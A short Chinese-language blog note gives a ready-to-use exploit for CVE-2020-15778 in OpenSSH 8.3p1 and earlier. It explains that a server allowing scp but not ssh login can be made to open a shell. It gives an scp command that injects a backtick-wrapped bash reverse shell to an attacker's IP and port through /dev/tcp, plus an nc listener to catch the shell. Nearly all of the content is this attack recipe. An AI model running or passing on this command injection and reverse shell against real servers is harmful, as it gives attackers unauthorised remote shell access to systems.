【笔记】CVE-2020-15778漏洞利用

发表于 更新于 阅读次数:

前言

采用OpenSSH作为SSH服务端的服务器,在已知用户名和密码的情况下,如果允许了scp命令,但不允许通过ssh命令远程登录,可以利用scp命令反弹Shell

漏洞利用前提

  • OpenSSH <= 8.3.p1

exp

<file>:随便一个本地文件
<ip>:攻击者IP地址
<port>:攻击者端口号

1
scp <file> <username>@<password>:'`bash -i >& /dev/tcp/<ip>/<port> 0>&1`x'
  • 监听反弹Shell
1
nc -lvp <port>

完成

参考文献

哔哩哔哩——xiaodisec